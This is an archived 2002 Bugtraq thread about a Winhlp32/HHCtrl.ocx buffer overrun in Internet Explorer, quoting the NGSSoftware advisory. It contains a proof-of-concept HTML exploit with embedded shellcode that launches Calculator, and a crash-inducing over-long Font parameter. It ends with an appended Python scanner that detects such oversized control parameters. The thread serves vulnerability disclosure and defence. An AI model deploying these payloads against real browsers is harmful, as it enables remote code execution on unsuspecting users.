Re: Winhelp32 Remote Buffer Overrun

From: Mark Litchfield (markat_private)
Date: Tue Aug 06 2002 - 12:23:38 PDT


    If I am not mistaken, I believe that Microsoft are aware of this issue and
    have an IE patch coming out very shortly.  My brother reported this to
    them, please see http://www.nextgenss.com/vna/ms-whelp.txt
    
    Regards
    
    Cheers,
    
    
    Mark Litchfield
    
    ----- Original Message -----
    From: "Jelmer" <jelmerat_private>
    To: "Next Generation Insight Security Research Team" <markat_private>;
    <bugtraqat_private>; <ntbugtraqat_private>
    Sent: Thursday, August 01, 2002 5:19 PM
    Subject: Re: Winhelp32 Remote Buffer Overrun
    
    
    > I just installed servicepack 3 and the following code still crashed my
    > IE6 with a memory could not be referenced error.
    >
    >  <OBJECT ID=hhctrl TYPE="application/x-oleobject"
    > CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
    >     <PARAM name="Command" value="Shortcut">
    >     <PARAM name="Button" value="Bitmap:shortcut">
    >     <PARAM name="Item1" value=",,">
    >     <PARAM name="Item2" value="273,1,1">
    >     <PARAM name="codebase" value="">
    >     <PARAM name="Font" value=" A VERY VERY LONG STRING ">
    > </OBJECT>
    >
    > I have been told this means it is most likely exploitable. I am not into
    > buffer overflows myself though, maybe someone can confirm this. Anyways I
    > notified Microsoft of this several months ago. The day after I notified
    > them someone pointed me to the ngssoftware advisory *sob*, and I notified
    > Microsoft that this was probably the same issue, last I heard from them
    > they were looking into if this was indeed the case. It's been several months
    > and as far as I know they are still looking.
    >
    > --
    >  jelmer
    >
    > ----- Original Message -----
    > From: "Next Generation Insight Security Research Team"
    > <markat_private>
    > To: <bugtraqat_private>; <ntbugtraqat_private>
    > Sent: Friday, August 02, 2002 3:59 AM
    > Subject: Winhelp32 Remote Buffer Overrun
    >
    >
    > > -----BEGIN PGP SIGNED MESSAGE-----
    > > Hash: SHA1
    > >
    > > NGSSoftware Insight Security Research Advisory
    > >
    > > Name:    Winhlp32.exe Remote Buffer Overrun
    > > Systems Affected:  Win2K Platform
    > > Severity:  Critical
    > > Category:               Remote Buffer Overrun
    > > Vendor URL:   http://www.mircosoft.com
    > > Author:   Mark Litchfield (markat_private)
    > > Date:   1st August 2002
    > > Advisory number: #NISR01082002
    > >
    > >
    > > Description
    > > ***********
    > >
    > > Many of the features available in HTML Help are implemented through
    > > the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX
    > > control is used to provide navigation features (such as a table of
    > > contents), to display secondary windows and pop-up definitions, and
    > > to provide other features. The HTML Help ActiveX control can be used
    > > from topics in a compiled Help system as well as from HTML pages
    > > displayed in a Web browser. The functionality provided by the HTML
    > > Help ActiveX control will run in the HTML Help Viewer or in any
    > > browser that supports ActiveX technology, such as Internet Explorer
    > > (version 3.01 or later). Some features, as with the WinHlp Command,
    > > provided by the HTML Help ActiveX control are meant to be available
    > > only when it is used from a compiled HTML Help file (.chm) that is
    > > displayed by using the HTML Help Viewer.
    > >
    > > Details
    > > *******
    > >
    > > Winhlp32.exe is vulnerable to a buffer overrun attack using the Item
    > > parameter within the WinHlp Command. The Item parameter is used to
    > > specify the file path of the WinHelp (.hlp) file in which the WinHelp
    > > topic is stored, and the window name of the target window.  Using
    > > this overrun, an attacker can successfully execute arbitrary code on
    > > a remote system by either encouraging the victim to visit a
    > > particular web page, whereby code would execute automatically, or by
    > > including the exploit within the source of an email.  In regards to
    > > email, execution would automatically occur when the mail appears in
    > > the preview pane and ActiveX objects are allowed (This is allowed by
    > > default, the Internet Security Settings would have to be set as HIGH
    > > to prevent execution of this vulnerability). Any exploit would
    > > execute in the context of the logged on user.
    > >
    > > Visual POC Exploit
    > > ******************
    > >
    > > This POC will simply display Calculator.  Please note that this was
    > > written on a Win2k PC with SP2 installed.  I have not tested it on
    > > anything else.
    > >
    > > <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
    > > codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
    > > type=application/x-oleobject width=0><PARAM NAME="Width"
    > > VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
    > > VALUE="WinHelp"><PARAM NAME="Item1"
    > > VALUE="3ĄPhcalc4$&#402;Ą&#1;PVøƧéw’Š3ĄP¾&#8221;éw’ÖAAAAAAAA
    > > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    > > AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP
    > > PPPQQQQRRRRSSSSTTTAAAA&#11;©õwABCDEFGH&#402;Ę&#21;’ęgMyWindow"><PARAM
    > > NAME="Item2" VALUE="NGS Software LTD"></OBJECT>
    > > <SCRIPT>winhelp.HHClick()</SCRIPT>
    > >
    > >
    > > Fix Information
    > > ***************
    > >
    > > NGSSoftware alerted Microsoft to these problems on the 6th March
    > > 2002. NGSSoftware highly recommend installing Microsoft Windows SP3,
    > > as the fix has been built into this service pack found at
    > > http://www.microsoft.com
    > > An alternative to these patches would be to ensure the security
    > > settings found in the Internet Options is set to high. Despite the
    > > Medium setting, stating that unsigned ActiveX controls will not be
    > > downloaded, Kylie will still execute Calc.exe.  Another alternative
    > > would be to remove winhlp32.exe if it is not required within your
    > > environment.
    > > A check for these issues has been added to Typhon II, of which more
    > > information is available from the
    > > NGSSoftware website, http://www.ngssoftware.com.
    > >
    > > Further Information
    > > *******************
    > >
    > > For further information about the scope and effects of buffer
    > > overflows, please see
    > >
    > > http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
    > > http://www.ngssoftware.com/papers/ntbufferoverflow.html
    > > http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
    > > http://www.ngssoftware.com/papers/unicodebo.pdf
    > >
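Added example, not part of the thread above: a gateway-side check that flags HTML instantiating the HHCtrl.ocx control (the CLSID quoted in both posts) with a WinHelp or Shortcut command whose Item/Font parameter is far longer than any legitimate .hlp path or window name. The length threshold and the sample markup are constructed assumptions for illustration.

```python
from html.parser import HTMLParser

# CLSID of the HTML Help ActiveX control (HHCtrl.ocx), as quoted in the thread.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"
# Commands named in the thread whose Item/Font parameters received over-long values.
SUSPECT_COMMANDS = {"winhelp", "shortcut"}
# Hypothetical threshold: a real .hlp path plus window name is far shorter than this.
MAX_PARAM_LEN = 260

class HHCtrlScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_hhctrl = False      # inside an <OBJECT> that loads HHCtrl.ocx
        self.command = None         # value of the Command PARAM, lower-cased
        self.param_lens = {}        # Item*/Font PARAM name -> value length
        self.findings = []          # (command, param name, length) per oversized PARAM

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "object":
            clsid = a.get("classid", "").lower().replace("clsid:", "").strip("{}")
            self.in_hhctrl = clsid == HHCTRL_CLSID
            self.command, self.param_lens = None, {}
        elif tag == "param" and self.in_hhctrl:
            name, value = a.get("name", "").lower(), a.get("value", "")
            if name == "command":
                self.command = value.lower()
            elif name.startswith("item") or name == "font":
                self.param_lens[name] = len(value)

    def handle_endtag(self, tag):
        if tag == "object" and self.in_hhctrl:
            if self.command in SUSPECT_COMMANDS:
                for name, length in self.param_lens.items():
                    if length > MAX_PARAM_LEN:
                        self.findings.append((self.command, name, length))
            self.in_hhctrl = False

def scan_html(markup):
    """Return (command, param, length) for every oversized HHCtrl parameter."""
    scanner = HHCtrlScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings

# Constructed samples: a benign WinHelp object and one carrying a 1000-byte Item1.
TEMPLATE = ('<OBJECT classid="clsid:%s" type="application/x-oleobject">'
            '<PARAM name="Command" value="WinHelp"><PARAM name="Item1" value="%s"></OBJECT>')
BENIGN = TEMPLATE % (HHCTRL_CLSID, "C:\\Help\\app.hlp")
OVERLONG = TEMPLATE % (HHCTRL_CLSID, "A" * 1000)
```

Objects using a different CLSID, or HHCtrl objects with short parameters, produce no findings, so the check can run over mail bodies or proxied pages without flagging ordinary help links.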
    



    This archive was generated by hypermail 2b30 : Tue Aug 06 2002 - 18:37:14 PDT